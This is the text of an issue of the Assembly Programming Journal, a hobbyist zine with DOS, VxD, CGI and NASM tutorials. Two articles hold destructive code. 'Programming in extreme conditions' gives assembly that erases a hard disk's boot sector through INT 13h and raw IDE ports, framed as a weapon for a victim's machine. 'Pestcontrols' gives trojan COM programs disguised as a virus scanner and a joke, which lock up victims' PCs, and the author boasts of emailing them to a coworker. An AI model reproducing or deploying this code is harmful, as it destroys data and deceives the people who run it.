::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.                                              Sep 00-Aug 01
:::\_____\::::::::::.                                             Issue       9
::::::::::::::::::::::.........................................................

            A S S E M B L Y   P R O G R A M M I N G   J O U R N A L
                      http://asmjournal.freeservers.com
                           asmjournal@mailcity.com


T A B L E   O F   C O N T E N T S
----------------------------------------------------------------------
Introduction.............................................Tiago.Sanches

"Programming in extreme conditions".......................Kalmykov.b52

"Pestcontrols"...........................................Jan.Verhoeven

Column: Win32 Assembly Programming
    "How to write VxDs using NASM".............................therain
    "Common Gateway Interface using PE console apps"....Michael.Pruitt

Column: The Unix World
    "Writing A Useful Program With NASM".................Jonathan.Leto
    "Command Line in FreeBSD".........................G.Adam.Stanislav
    "Compressing data"...................................Feryno.Gabris

Column: PalmOS Environment
    "Hello Tiny World"..........................................Latigo

Column: Gaming Corner
    "Win32 ASM Game Programming - Part 2"..................Chris.Hobbs
      
Column: Assembly Language Snippets
    "Basic trigonometry functions"....................Eoin.O'Callaghan
    "getpass"................................................Jake.Bush
    "strcmp".................................................Jake.Bush
    "strlwr".................................................Jake.Bush
    "strupr".................................................Jake.Bush

Column: Issue Solution
    "Exact Pattern Matching Algorithms"...............Steve.Hutchesson
    "Binary String Search Algorithm".........................buliaNaza

----------------------------------------------------------------------
       +++++++++++++++++++Issue Challenge++++++++++++++++++
              Code a fast pattern matching algorithm
----------------------------------------------------------------------


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::..............................................INTRODUCTION
                                                               by Tiago Sanches


Finally, issue 9 is out!

After a long, long time APJ is back. What happened?

Well, mainly due to mammon_'s lack of free time to handle everything concerning
the journal by himself and whatnot (which may have led to a shortage of
contributions), APJ had to be discontinued as of last year. The good news are
that the journal is back, many people have volunteered to help out and so in
the future a staff may actually be a reality, allowing things to run smoother
than they have. On a side note, mammon_ is still administrating the journal,
even if time constraints don't allow him to get as involved in its management
as before.

Anyway, about this issue, there are articles ranging from CGI programming,
written by Michael Pruitt, to the continuation of Chris Hobbs' gaming series
(that Chili prepared for ASCII distribution). A new column has also been
created, concerning the emerging PalmOS platform, featuring a very good
introductory article by Latigo.

G. Adam Stanislav contributed another article for the Unix side, along with
Feryno Gabris, who presents an ELF compressor, whose text may look somewhat
cryptic at first if not for the source code provided, both NASM oriented. Also
for NASM, therain shows how to write VxDs and Jonathan Leto provided an article
for the beginning assembly programmer.

To close the list is a "back to the stone age" low-level programming article by
Kalmykov.b52 for when everything you have is MS-DOS and, lastly, it's Jan
Verhoeven's payback day as he says: "This time the joke is on you!".

All in all this issue is packed with very good articles, not mentioning the
great trigonometry macros by Eoin O'Callaghan in the snippets section, as well
as some other pieces of code from Jake Bush and at the end the issue challenge
that this time focuses on pattern matching algorithms, featuring a great work
done by Steve Hutchesson along with code presented by buliaNaza.

Just a reminder for contributers on submission guidelines: articles must be
written in English and may focus on any aspect of assembly language for any
level of programming, but remember that they must be in ASCII text format. Here
are some rules to follow:

    - lines should have a maximum of 80 characters (including the 'New Line'
      character), with no left or right margins.
    - article subsections should consist of a subsection name, a following line
      of hyphens to underscore and be preceded by two carriage returns.
    - Paragraphs should not be indented and must be seperated by a blank line.
    - Code indentation (opcodes) should be about 8 chars.
    - Don't use TABs, use spaces instead!

That said, remember to supply a name or handle and a title for the article and
check the contents of the current issue for a general idea of the magazine's
format. You can mail the articles, snippets or any other contribution to me at:

    sanches@host.sk

Hopefully, with your help, issue 10 will be out faster than this one and the
journal can start being released on a regular basis again.

As mammon_ would say, enjoy the mag!


Tiago Sanches


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                              Programming in extreme conditions
                                              by Kalmykov.b52


INTRODUCTION
------------
What is 'extreme conditions' ? When you are sitting in front of a computer with
only MS-DOS installed without any compilers, hex editors, shells, debuggers and
you need to recover lost data, delete virus, or write a new one. This is an
extreme conditions. Most of programmers won't be able to do anything, most of
administrators think that this computer is 100% secured. But this won't stop
the assembler programmer ...

I have chosen pure MS-DOS as the operation system to program for because in
Windows there are many things that will easier this task (e.g. in Windows 98
there is-built in browser with VBScript and Java Script interpretators so you
can easy write a hex-editor and more).

This article will be interesting as for the beginners and experienced
programmers. Also I recommend it to hackers, administrators, and anybody who
wants to feel the spirit of low-level programming, which now is disappearing
with the previous programmers generation generation.


THE BEGINNING
-------------
To read and understand this you will need this minimum: the knowledge of
Assembler, experience working with MS-DOS. Also you will need the list of x86
instructions opcodes, ASCII table, and lot of free time. First of all, we need
some kind of text editor. But the administrator removed EVERYTHING that could
help us. There is only one thing that differs a good programmer from any other-
It's the deep knowledge of everything he works with. If works with DOS he knows
everything about it. There is undocumented functions that opens a tiny text
editor, but that's enough. Enter this DOS command:

C:\copy con test.com

You will run the text editor. This is our instrument. But we still don't know
how to write binaries. If you will look to official MS-DOS manual, you'll find
the answer. Using ALT key and the numeric keyboard you can create binaries.
First of all check if the NUMlock is on. Now press ALT, type 195, now release
ALT. To save file and exit press CTRL-Z and hit enter. Now run it. It doesn't
do anything but it doesn't halt the system. If you disassemble it you will find
that test.com consists of only one operand RETN. As you already guessed opcode
of RETN (195 == 0xC3), and in decimal it is 195.


ADVANCED
--------
Well, It was easy. Now try to enter this:

ALT-180 ALT-09 ALT-186 ALT-09 ALT-01 ALT-205 ! ALT-195 ALT 32 Hi,world!$

Than press CTRL-Z and hit enter. It is clear that this program that prints
"Hi,world!". Let's disassemble it:

49E0:0100                       start:
49E0:0100  B4 09                               mov     ah,9
49E0:0102  BA 0109                             mov     dx,offset data_1
49E0:0105  CD 21                               int     21h ; DOS Services
                                                           ; ah=function 09h
                                                           ; display char
                                                           ; string at ds:dx
49E0:0107  C3                                   retn
49E0:0108  20                                   db      20h
49E0:0109  48 69 20 21 21 21    data_1          db      'Hi,world!$
                                                        ; xref 49E0:0102

I hope you know about the reversed order in machine word (ALT-09 ALT-01 = 109).
Also, in order to show the beauty of this method, I used symbol '!' == 0x21 to
call interrupt 0x21. So knowing ASCII codes can easier your life. But why we
need this symbol (20h == ALT-32 == " ") at 49E0:0108 ?
This is the main problem of this method. Using ALT and numeric keyboard we
cannot enter some symbols. Here is a list of them:

        0,3,6,8,16(0x10),19(0x13),27(0x1b),255(0xFF)

You will need to avoid this symbols. If you look at the code, you'll see that
the real offset is 0x108. After adding a symbol the offset became 0x109.
Actually there is more elegant way to do it:

        mov     dx,109
        dec     sx

These two variants are equal (dec dx == 1 byte) and you chose what suits you
best. Another problem is finding offset of variables and labels. You can write
program on the paper, giving to variables symbolic names, and then the
program will be ready it will be easy to find necessary offsets and address.
Another possibility is declaring all variables before their usage:

        mov     ah,9
        jmp     sort $+20
        db      'Hi,world!'$
        mov     dx,0x100+2+2; 0x100 - the base adress,2 - lengh of
                             ; mov  ah,9, 2 - lengh of jmp

jmp short $+20 - reserves 20 bytes for the string. This method could be also
used for labels.


THE EXAMPLE
-----------
I think you are tired of these theoretical programming and feel ready to see
this method in work. As illustration we will to create a program that erases
the boot sector. Attention ! The usage of this program in order to destroy
information is a crime. You should use it only for experimental purpose.

First of all, let's write it on assembler:

B80103   mov     ax,00301
B90100   mov     cx,00001
BA8000   mov     dx,00080
CD13     int     013
C3       retn

As you see we have one #0 and two #3. Let's modify the program to avoid them:

        xor     ax,ax
        mov     ds,ax
        mov     ax,00299
        inc     ax
        inc     ax
        xor     cx,cx
        inc     cx
        mov     dl,80
        mov     bx,13h*4
        pushf
        cli
        push    cs
        call    dword ptr [bx]
        retn

Maybe it's quite a hard example. The assembler programming and interrupts
are not really the subject of this article. I can only forward you to the other
references that you can easily find on the Internet. Fortunately
(or unfortunately, depends on readers orientation), in BIOS there is a boot
write protection (sometimes it's called "Virus warning").It will block any
efforts to modify the main boot sector.

For example, running this program under Windows 98 operation system will take
no effect. But we still can work with hard drive I/O ports on a low-level.
Here is an example of program that will erase main boot sector, through hard
drive I/O ports:

        mov     dx, 1F2h
        mov     al,1
        out     dx,al
        inc     dx
        out     dx,al
        inc     dx
        xor     ax,ax
        out     dx,al
        inc     dx
        out     dx,al
        mov     al, 10100000b
        inc     dx
        out     dx,al
        inc     dx
        mov     al,30h
        out     dx,al
        lea     si, Buffer
        mov     dx, 1F0h
        mov     cx, 513
        rep     outsw

I don't know any popular protection that can track and block that program.
However, that doesn't refer to Windows NT, this OS won't allow any program
without necessary privileges to work with ports, even more it will close
the application's window. Preparing this example for entering it using ALT
and optimizing It's size I will leave as an exercise to the readers.That's all:
enter this in victims machine and you have powerful weapon. I recommend to use
it very carefully.


ENDING
------
It's not easy. All this requires a lot of experience and talent but gives you
incredible power on machine(and i hope you won't be using this power for
destruction). All this looks quite unuseful, you can say that you won't need
it - but who knows?.. Nowdays programmer depends on the powerfull development
tools (compilers, debuggers, editors) and when he stay alone with 'nature'
he cannot control the situation anymore - he cannot control the machine ...


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                               Pestcontrols
                                                               by Jan Verhoeven


Are you plagued now and then by friends and relatives who send you funny
pictures (mostly with a lot of "beneath the belt content") via E-mail?

I used to have them. I got rid of these pests.

How I did it? I sent back some nice programs. And if they run Outlook Express,
they can't resist to open the attachment.

What I do is NOT make a virus. It is at best a trojan horse, but in fact it
doesn't even come close to a trojan. No harm is done (intentionaly) unless the
victim is a real moron and starts an unknown executable.


Pestcontrol 1: the virus scanner
--------------------------------
Most of the afore mentioned morons know of the exsitence of virus scanners. So
they will be more than eager to try out the latest one, especially if it is as
compact as this one:

name scan

lf equ 10
cr equ 13

mov dx, offset text
mov ah, 9
int 021 ; show some message

back: cli ; disable keyboard etc
jmp back ; and do it again

mov ax, 04C00 ; by the time pigs can fly, ...
int 021 ; ... the program is halted.

text db 'Scanning your system....', cr, lf
db 'Please wait a minute. $'
db 1023 dup (073)

Yes, you are right, this COM file is something like 1 Kb in size. You can
easily control the size by adjusting the value in the last line. Make sure to
remain well under the 64K limit else the file cannot be a COM file anymore and
there is a chance that a wraparound will occur in which you main routine will
be overwritten.

I hesitate to explain the program. It's so damned simple. In part 1 the message
is printed to the screen. In part 2 the computer is crippled and in part 3 the
program returns to the command interpreter, only this point is never
reached.... :o)

Believe me: people will wait HOURS before they get worried and try to
Alt-Ctrl-Del themselves a way out of this problem. Only to find out that their
efforts are in vain.
If this program is run from within a DOS box under WIndows, and the user had a
lot of other tasks open, he will loose any unsaved work. And if he or she is on
a network, it may be crippled as well.

So be a little bit careful who you treat to this attachment.....


Pestcontrol 2: something funny
------------------------------
We all like jokes, don't we? So we send eachother large breasted foto's and
such. I have a joke to send back to these persons. It's a real funny program,
believe me. And efficient.

name funny

cli ; disable keyboard and interrupts
cld ; make sure we move upwards
mov ax, 0A000 ; point to start of VGA pixel RAM
mov es, ax
mov ds, ax
L1: cli ; INT's off again, just in case...
mov cx, 08000
mov ax, 0
mov di, ax
mov si, ax
L0: cli ; did I turn of INT's?
lodsw ; fetch word from VGA screen
xor ax, ax ; clear it
stosw ; and store it
loop L0 ; loop back to CLI instruction
cli ; and turn off interrupts
jmp L1 ; before jumping back to the CLI.

db 22K dup ('� ') ; add some more muscles.

This is a real nasty program. One of the guys at work (two windows away from my
place; I could see the results...) had been sending me several 500 Kb funnies.
I asked him to remove me from his mailing but he didn't listen. So I shot back
(hey, it was self defence!).

The first part of the program kills the keyboard and other interrupts, whereas
the second part plays a nasty trick on the user screen. I assume the user is
running Windows on a VGA screen.... It keeps on pumping ZERO's into display
memory in a loop that's almost impossible to stop. If the CPU would manage to
enable interrupts again it will loose control after another few nanoseconds (on
modern CPU's) or microseconds (on older ones).

The result is devastating: they run the FUNNY.EXE (if there is no MZ in the
exe-header, the program is considered a COM file) and the screen turns black
immediately and they loose all control of the machine. The three fingered
salute will not help. The only option is to pull the plug.

This executable did the trick. Four requests to relieve me from his mail
assaults did not work. One counterattack with my Funny Exe was effective
immediately.


Afterthoughts
-------------
Yes, these programs are nasties. They should NOT be copied or used too soon. On
the other hand, Windows is so clumsily programmed (there should be IO
Privileges on task switching instructions like IN, OUT and CLI but there
aren't) that it enables malicious software to cause the effects they do.


Reminder
--------
The code published here is GNU GPL. Don't try this at home.


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
                                                   How to write VxDs using NASM
                                                   by therain


I.   About the readers and article's files overview
II.  MASM vs NASM : Syntax overview
III. A skeleton VxD
IV.  More VxD examples
V.   FAQs
VI.  About the writer


I. About the readers and article's files overview
-------------------------------------------------
This article is aimed at the user that already does little Virtual Device
Driver (VxD) progamming using Microsoft's Macro Assembler (MASM). It will only
cover how to use the Net Wide Assembler (NASM) to write Virtual Device Drivers
and not how to learn VxD programming using NASM.
It is also suggested that the user be familiar with NASM or read NASM DOC.

As for the files in this article:

NASMVXD.TXT     -   This article.
VXDN.INC        -   Contains VxD related definitions and macros for NASM.
WINDDK.INC      -   This is used by VXDN.INC and should'nt be directly included
                    by you. It contains VxD related EQU's and it also has VxD
                    services covering VMM,Shell,Debug,...


II. Overview about MASM & NASM
------------------------------
It is time to mention that NASM was never intended to produce VxD files and you
won't be able to produce any without the include files from this package and
without Microsoft's Incremental Linker (LINK.EXE).

Okay, now the syntax differences between MASM & NASM.

Processor Mode:
---------------
To enable the use of 386+ protected mode instructions you used to put a '.386p'
in MASM, no need for that in NASM, however you have to explicitly set the
default bitness to 32 via the 'BITS 32' directive (and to 16 in the real mode
initialization segment).

    MASM:    .386p
    NASM:    BITS 32

Segments specification:
-----------------------
MASM has lot of segments declaration macros unlike NASM in which you have to
name the segment as you stated it in the .DEF file.

The 5 basic segment definition macros are:

    MASM:                    NASM:            Description
    -----                    -----            -----------
    VxD_CODE_SEG/ENDS        segment _LTEXT   Protected mode code seg.
    VxD_DATA_SEG/ENDS        segment _LDATA   Protected mode data seg.
    VxD_ICODE_SEG/ENDS       segment _ITEXT   Protected mode initialization
                                              code segment. (usually optional)
    VxD_IDATA_SEG/ENDS       segment _IDATA   Protected mode initialization
                                              data segment. (usually optional)
    VxD_REAL_INIT_SEG/ENDS   segment _RTEXT   Real mode initialization
                                              segment. (optional too)

Notice that NASM does not need a segment closing macro unlike MASM.

To start a new segment just declare it like 'segment _LTEXT' and everything
after that line will go to that segment.

Please do not use the intrinsic form of the segment macro (e.g.
[segment _LTEXT]) as certain VxD macros rely on saving/restoring the current
segment and they would fail should you use the intrinsic form.

Check the FAQ for a brief segment overview or NASMDOC.TXT for full overview.

Virtual Device Desciptor Block (DDB) Declaration:
-------------------------------------------------

    MASM:
    -----
    Declare_Virtual_Device Name, MajorVer, MinorVer, CtrlProc, DeviceNum,
                           InitOrder, V86Proc, PMProc, RefData

    NASM:
    -----
    Due to the fact that NASM does not support string concatenation in macros
    yet (there exist patched versions which do), the declaration is a bit
    different:

    Declare_Virtual_Device Name, 'Name', MajorVer, MinorVer, CtrlProc,
                           DeviceNum, InitOrder, V86Proc, PMProc, RefData

    Params 5 to 9 are optional, since most of the time they are generic (not
    used).

    The extra parameter is 'Name' which will become the DDB_Name field in the
    DDB (this is the name by which the VxD will be known to the VMM), Name
    itself determines the name for the Control Procedure and the Service Table
    (if used).

    The DDB must be declared inside the _LDATA segment.

    Example:

    segment _LDATA
    Declare_Virtual_Device SAMPVXD1, 'SAMPVXD1', 1, 0, SAMPVXD1_Control

Control Procedure Definition:
-----------------------------

    MASM:
    -----
    Begin_Control_Dispatch NAME
        Control_Dispatch Message,Proc
    End_Control_Dispatch

    NASM:
    -----
    This will be a little new for you since you have to do it by hand and not
    by similar macros:

    segment _LTEXT

    VXDNAME_Control:
        cmp  eax,VM_INIT
        je   OnVmInit

        cmp  eax,W32_DEVICEIOCONTROL
        je   OnDIOC

        cmp  eax,<system message>
        je   <Desired Event handler proc>

        clc  ; At any time during initialization, a virtual device can set the
             ; carry flag and return to the VMM to prevent the virtual device
             ; from loading. This means that the carry flag must be cleared to
             ; allow loading.

        retn

    OnVmInit:
        ; Do some code
        ret

    OnDIOC: ; OnDeviceIoControl
        ; ESI points to a DIOCParams struct
        cmp   word [esi+DIOCParams.dwIoControlCode],MY_DIOC_CODE
        je    domycode

        retn   ; Don't forget to put a return as you're used to put a
               ; "EndProc procname"

Any Other procedure Definition
------------------------------
Using NASM's normal procedure definition you can define a new proc as
usual: "procname :".
As for calling conventions you have to access the stack yourself or use some
other NASM macros.

Using VxdCall and VMMCall
-------------------------
In NASM you can call: VMMCall Service,param1,{param2},[ [{]param3[}] ],....


III. A skeleton VxD
--------------------
A skeleton VxD will be a very basic VxD enough to be loaded correctly and do
nothing more than taking up memory. =)

In NVXDSKEL.DEF you can specify if it will be a DYNAMIC or a STATIC VxD like:

VXD MYVXD DYNAMIC  ; dynamic vxd
VXD MYVXD          ; static vxd

NVXDSKEL.DEF
------------

VXD NVXDSKEL DYNAMIC

SEGMENTS
  _LTEXT      CLASS 'LCODE'   PRELOAD NONDISCARDABLE
  _LDATA      CLASS 'LCODE'   PRELOAD NONDISCARDABLE
  _TEXT       CLASS 'LCODE'   PRELOAD NONDISCARDABLE
  _DATA       CLASS 'LCODE'   PRELOAD NONDISCARDABLE
  CONST       CLASS 'LCODE'   PRELOAD NONDISCARDABLE
  _ITEXT      CLASS 'ICODE'   DISCARDABLE
  _IDATA      CLASS 'ICODE'   DISCARDABLE
  _PTEXT      CLASS 'PCODE'   NONDISCARDABLE
  _PDATA      CLASS 'PDATA'   NONDISCARDABLE SHARED
  _STEXT      CLASS 'SCODE'   RESIDENT
  _SDATA      CLASS 'SCODE'   RESIDENT
  _DBOSTART   CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
  _DBOCODE    CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
  _DBODATA    CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
  _RCODE      CLASS 'RCODE'

EXPORTS
  NVXDSKEL_DDB @1

NVXDSKEL.ASM
------------

bits 32

%include "vxdn.inc"

segment _LDATA

Declare_Virtual_Device NVXDSKEL,'NVXDSKEL',1,0,NVXDSKEL_Control

segment _LTEXT

NVXDSKEL_Control:
        clc
        retn

Assembling and linking:
-----------------------
* To assemble you must have NASM v0.98+
NASM NVXDSKEL.ASM -f win32
LINK NVXDSKEL.OBJ /VXD /DEF:NVXDSKEL.DEF

That's it!


IV. More VxD examples
---------------------
This example will show the use of VMMCall and VxDCall

VXDSAMP1.DEF
------------

VXD VXDSAMP1 DYNAMIC

SEGMENTS
  _LTEXT      CLASS 'LCODE'   PRELOAD NONDISCARDABLE
  _LDATA      CLASS 'LCODE'   PRELOAD NONDISCARDABLE
  _TEXT       CLASS 'LCODE'   PRELOAD NONDISCARDABLE
  _DATA       CLASS 'LCODE'   PRELOAD NONDISCARDABLE
  CONST       CLASS 'LCODE'   PRELOAD NONDISCARDABLE
  _ITEXT      CLASS 'ICODE'   DISCARDABLE
  _IDATA      CLASS 'ICODE'   DISCARDABLE
  _PTEXT      CLASS 'PCODE'   NONDISCARDABLE
  _PDATA      CLASS 'PDATA'   NONDISCARDABLE SHARED
  _STEXT      CLASS 'SCODE'   RESIDENT
  _SDATA      CLASS 'SCODE'   RESIDENT
  _DBOSTART   CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
  _DBOCODE    CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
  _DBODATA    CLASS 'DBOCODE' PRELOAD NONDISCARDABLE CONFORMING
  _RCODE      CLASS 'RCODE'

EXPORTS
  VXDSAMP1_DDB @1

VXDSAMP1.ASM
------------

bits 32

%include "vxdn.inc"

segment _LDATA

Declare_Virtual_Device VXDSAMP1,'VXDSAMP1',1,0,VXDSAMP1_Control

segment _LTEXT

VXDSAMP1_Control:
        cmp  eax,W32_DEVICEIOCONTROL
        je   OnDIOC

        clc
        retn

OnDIOC:
        cmp  dword [esi+DIOCParams.dwIoControlCode],1
        je   .1

        xor  eax,eax
        jmp  .ret
        .1:

        VMMCall Get_Sys_VM_Handle

        xor   esi,esi ; no callback
        xor   edx,edx ; no ref data for callback
        mov   eax,0
        mov   ecx,Msg
        mov   edi,Title
        VxDCall SHELL_Message

       .ret:
        retn

segment _LDATA
Msg   db 'Hello world!',0
Title db 'Title!',0

<EOF>

And another example that calls Int21/Ah=02,dl=7 to beep.

VXDSAMP2.ASM
------------

bits 32

%include "vxdn.inc"

segment _LDATA

Declare_Virtual_Device VXDSAMP2,'VXDSAMP2',1,0,VXDSAMP2_Control

segment _LTEXT

VXDSAMP2_Control:

        cmp  eax,W32_DEVICEIOCONTROL
        je   OnDIOC

        clc
        retn

OnDIOC:
        cmp  dword [esi+DIOCParams.dwIoControlCode],1
        je   .1

        xor  eax,eax
        jmp  .ret

        .1:
        VxDCall Begin_Nest_V86_Exec

        mov word [ebp+CRS.EAX],0x0200
        mov word [ebp+CRS.EDX],0x0007
        mov eax,0x21

        VxDCall Exec_Int

        VxDCall End_Nest_Exec

       .ret:
        retn
<EOF>

Use .DEF like previous example but change name to the new VxD name.

To test the last two examples, just open the VxD with CreateFileA() and then
issue a DeviceIoControl() with code 1.


V. FAQs
-------
Q) Where can i get NASM and LINK from?
A) As for NASM you can get it from:
     http://www.web-sites.co.uk/nasm/
   As for LINK.EXE you can get it from the DDK or just download the MASM Pack
   from http://win32asm.cjb.net

Q) How can i add new services and use them with NASM?
A) You can start by defining:

   MyDevice_DeviceID equ 0x1234 ; must be word

   and then define a service table like:

   Begin_Service_Table MyDevice
      VMM_Service MyService0                 ; 0x0000 ord
      VMM_Service MyService1                 ; 0x0001 ord
      VMM_Service MyServiceN                 ; ord N
   End_Service_Table MyDevice


VI. About the writers
---------------------
Me as therain, would like to credit:

fOSSiL
  &
The Owl  - For creating VXDN.INC and
           for showing how to write VxDs in NASM in the first place
           by demonstrating it in IceDump (visit: http://icedump.tsx.org).
           And for reviewing/editing this document.

Iczelion - For his awesome win32asm resource site and for his
           good VxD tutorials. (visit: http://win32asm.cjb.net)

UKC Team - For their support.


[The VXDN.INC and WINDDK.INC files can be obtained from

 http://asmjournal.freeservers.com/files/nasmvxd.zip

 where they have been archived along with the text of the article.]


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
                                 Common Gateway Interface using PE console apps
                                 by Michael Pruitt


CGI: Tutorial 01: Supplying Dynamic Data to a Web Client
--------------------------------------------------------
In the early '90s the NCSA released HTTPd 1.0 (a web server), a new concept was
included; CGI.  This feature allowed web content to be dynamically generated on
the server.  Up-to-date reports of stocks, scores, and weather were possible
with CGI.  Other uses include message boards, guest books, or e-stores.

Typically a CGI application will interface with a Mosaic type web browser;
supplying HTML with the data.  When the server recieves a request targeting a
CGI program, it will lauch the application.  Any data from the client will be
piped to StdIn.  The app's StdOut will then be sent back to the client.


Tools Needed
------------
This tutorial is written for FAsm (http://omega.im.uj.edu.pl/~grysztar/). If
you wish to assemble the program, you will need FAsm 1.13.4 (or later) or you
can translate it to an assembler supporting 80x86 PE console.

For any CGI testing access to a web server is a must. I recommend Apache 1.3.20
(http://httpd.apache.org/). For starting out, you can place your assembled
executable into the \Apache\cgi-bin\ directory. For the server name use
"localhost" (excluding the quotes).

Knowledge of HTML (HyperText Markup Language) is usefull. The basics of HTML
are easy to learn. CSS (Cascading Style Sheets) will prove invaluable if you
use a lot of HTML. A list of books is provided at the end of this article.

A Win32 platform. My system consist of Win 98 SE on a Celeron 433 w/ 128MB RAM.
Win 95 - NT should work without issues. A Linux box running WINE shoud also
work for those with a strong stomach.


Win32 API
---------
Since everything a CGI application does is non GUI, the kernal32.dll will
suffice for most projects.  Database intensive app's will link to other dll's
to better implement designs.

To access the Standard I/O, will need to use GetStdHandle.  Under Win32, StdIO
is not availiable under predefined handles.  ReadFile and WriteFile is used to
move data.  ReadConsole and WriteConsole will not work; file redirection in not
availiable.


CGI Environment
---------------
A CGI program is not required to read data, but it is required to send it.
Client data is availiable on the StdIn. The length is in the CONTENT_LENGTH
environment variable.  Also, 255 bytes of the data is in the QUERY_STRING
EnvVar.  All out put must start with "Content-Type:" a space, the type, and two
newlines (CrLf).  Common types include: "text/plain", "text/html", or
"image/gif". Example output:

        Content-Type: text/plain

        Hello World. Example of HTTP 1.1 header and body.

If you don't write any data, the web server will report with the error:
"Premature end of script headers".  If you really don't want to supply data,
you could just write: "Content-Type: text/plain" and two newlines.


The Example Program
-------------------
The program I've supplied writes HTML containing the current date and time.  It
demonstrates use of API's, HTML, data manipulation.


~~~~~~~~~~~~~~~~~~~|||-------------------[code]-------------------|||
format PE console
entry Start

include '\Asm_Win32\Include\_Kernel.inc'
include '\Asm_Win32\Include\macro\stdcall.inc'
include '\Asm_Win32\Include\macro\import.inc'

   Cr    = 0x0D
   Lf    = 0x0A
;***---------------------------------------------------------------***
section '.code' code readable executable
Start:
    pusha                                        ;Save all of the Registers
    stdcall [GetStdHandle], STD_OUTPUT_HANDLE    ;Retrive the actual handle
    mov     [StdOut], eax
    cmp     eax, INVALID_HANDLE_VALUE            ;Error with handle
    jz      Exit

Get_Time:
    stdcall [GetSystemTime], Time                ;Load SYSTEMTIME with UTC
    call    Format_Time                          ;Convert Hex(bin) to ascii
                                                 ; and Place into HTML
Write:
    stdcall [WriteFile], [StdOut], HTML, HTML._size, HTML.Len, 0
                                                 ;Write the HTML to StdOut
Exit:
    popa                                         ;Restore all of the Registers
    stdcall [ExitProcess], 0

;***-------------------------[Subroutine]--------------------------***
Format_Time:
    mov     ax, [Time.wYear]                     ;16b Data
    mov     edi, HTML.Date_S + 9                 ;Ptr to LAST byte of dest
    call    .ascii                               ;Convert and place into HTML

    mov     ax, [Time.wDay]
    mov     edi, HTML.Date_S + 4
    call    .ascii

    mov     ax, [Time.wMonth]
    mov     edi, HTML.Date_S + 1
    call    .ascii

    mov     edi, HTML.Day_S                      ;Destination Ptr
    mov     esi, Day.Wk                          ;Source Ptr (Array of Days)
    xor     eax, eax
    mov     ax, [Time.wDayOfWeek]                ;0 <= eax < 7
    add     esi, eax                             ;esi =+ eax * 3
    add     esi, eax                             ; Indexes the Array
    add     esi, eax
    mov     ecx, 3                               ;3B per Day String
    cld                                          ;Copy Left to Right
    rep                                          ;    (esi++, edi++)
    movsb

    mov     ax, [Time.wHour]
    cmp     al, 13                               ;Check for PM
    jl      .wHour
    sub     al, 12                               ;Correct Hour
    mov     [HTML.Time_S + 9], 'P'               ; AM -> PM

.wHour:
    mov     edi, HTML.Time_S + 1
    call    .ascii

    mov     ax, [Time.wMinute]
    mov     edi, HTML.Time_S + 4
    call    .ascii

    mov     ax, [Time.wSecond]
    mov     edi, HTML.Time_S + 7
    call    .ascii
    ret

;***----------------------[Import Table / IAT]---------------------***
 .ascii:
    std                                          ;String OPs Right to Left
    cmp     ax, 10                               ;Single Digit?
    jl      .onex10

    and     ah, ah                               ;Only Two Digits
    jz      .twox16

    mov     bh, 10                               ;Reduce 3x16 to 2x16
    div     bh                                   ;  so that AAM can be used
    or      ah, 0x30                             ;BCD -> ASCII
    mov     [edi], ah
    dec     edi
 .twox16:
    aam                                          ; AH / 10 = AH r AL
    or      al, 0x30                             ;BCD -> ASCII
    stosb
    mov     al, ah
    cmp     ah, 9
    jg      .twox16
 .onex10:
    or      al, 0x30
    stosb                                        ;Copy Last/Only Digit to Mem
    ret

;***--------------------[Data used by this App]--------------------***
section '.data' data readable writeable
  StdIn         dd 0                             ;Standard I/O Handles
  StdOut        dd 0

HTML:
db 'Content-type: text/html', Cr, Lf, Cr, Lf
db '<html><head><title>Hello World</title></head>', Cr, Lf
db '<body bgcolor=Black text=Cyan><h1>Hello World</h1>', Cr, Lf
db '<h2><font color=Lime>', Cr, Lf
db 'This HTML is dynamicly generated by a PE console Application writen in'
db '80x86 Assembler</font></h2>', Cr, Lf
db '<h2><font color=Red>It is: </font><font color=Blue>'
   .Day_S       db 'WkD '
   .Date_S      db ' 0/00/0000</font> <font color=Magenta>'
  .Time_S      db ' 0:00:00 AM</font> <font color=Lime>UTC</font></h2>', Cr, Lf
                db '</body></html>', Cr, Lf
HTML._size     = $ - HTML - 1
HTML.Len        dd 0                            ;Number of bytes actually wrote

  Time          SYSTEMTIME
  Day.Wk        db 'SunMonTueWedThuFriSat'

;***----------------------[Import Table / IAT]---------------------***
section '.idata' import data readable writeable

library     kernel,             'KERNEL32.DLL'

kernel:
  import    GetModuleHandle,    'GetModuleHandleA',\
            GetCommandLine,     'GetCommandLineA',\
            GetSystemTime,      'GetSystemTime',\
            GetEnvVar,          'GetEnvironmentVariableA',\
            GetStdHandle,       'GetStdHandle',\
            CreateFile,         'CreateFileA',\
            ReadFile,           'ReadFile',\
            WriteFile,          'WriteFile',\
            CloseHandle,        'CloseHandle',\
            ExitProcess,        'ExitProcess'
__________________|||-------------------[/code]-------------------|||


How to Run
----------
You can run this example from the command line since it requires no client
data.  You can also pipe the data into an html doc and open with IE:
    Main > Text.html
For the real CGI, place Main.exe into the cgi-bin directory, launch Apache, and
type "localhost/cgi-bin/Main.exe" in the address box of IE.


References
----------
    SAMS Teach Yourself CGI in 24 Hours
            SAMS 2000                                   $24.99US
            Rafe Colburn                                ISBN: 0-672-31880-6

    CGI by Example
            QUE 1996                                    $34.99US
            Robert Niles & Jeffry Dwight                ISBN: 0-7897-0877-9

    HTML in Plain English - 2nd Edition
            MIS Press 1998                              $19.95US
